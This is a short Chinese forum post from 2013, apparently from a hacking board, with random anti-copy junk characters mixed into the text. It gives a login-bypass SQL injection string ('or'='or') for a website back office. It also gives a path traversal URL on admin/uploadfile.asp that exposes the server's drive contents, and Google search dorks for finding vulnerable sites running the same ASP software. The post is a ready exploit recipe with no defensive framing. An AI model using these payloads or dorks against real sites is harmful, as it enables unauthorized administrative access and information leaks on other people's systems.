后台万能密码 'or'='or'; L. ^4 P- o9 W9 Z- c. F& x
" g+ @# g0 @. `
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 c2 S2 @( e7 k n/ ~, E% G5 vadmin/uploadfile.asp?currentFolder=/upfiles/../
. }5 t- u) J% m. z u: R
; X; _2 K7 U4 U漏洞证明:1 x- g2 F5 G( @; {9 `7 x0 I
3 r' ]$ s, t& s* G: X谷歌:inurl:type.asp?id=1 新闻中心
. _& {2 z# _4 T; Q5 M" M8 j或者 :inurl:download_ok.asp?9 F: h+ [+ O% N
; H; w+ l' b7 w3 R/ J+ {; Z2 | |
发表于 2013-3-14 20:17:32
收藏
支持
反对